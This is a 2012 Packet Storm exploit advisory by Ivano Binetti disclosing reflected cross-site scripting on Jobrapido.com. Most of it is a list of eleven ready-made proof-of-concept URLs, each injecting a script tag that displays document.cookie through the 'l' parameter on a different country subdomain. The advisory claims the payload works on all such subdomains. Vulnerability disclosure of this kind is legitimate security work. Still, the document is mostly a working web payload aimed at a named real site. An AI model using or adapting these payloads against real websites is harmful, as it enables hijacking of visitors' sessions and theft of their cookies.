Jobrapido.com Cross Site Scripting

2012-03-07T00:00:00
ID PACKETSTORM:110546
Type packetstorm
Reporter Ivano Binetti
Modified 2012-03-07T00:00:00

Description

                                        
                                            `+--------------------------------------------------------------------------------------------------------------------------------+  
# Exploit Title : Jobrapido.com Multiple XSS   
# Date : 07-03-2012  
# Author : Ivano Binetti (http://www.ivanobinetti.com)  
# Web site : http://www.jobrapido.com  
# Web master notification : 07/11/2011  
  
+--------------------------------------------------------------------------------------------------------------------------------+  
  
PoC:  
http://us.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
http://uk.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
http://it.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
http://ae.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
http://ao.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
http://ar.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
http://at.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
http://au.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
http://be.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
http://br.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
http://ca.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
  
This Poc works for all third-level domains.  
  
  
  
+--------------------------------------------------------------------------------------------------------------------------------+  
  
`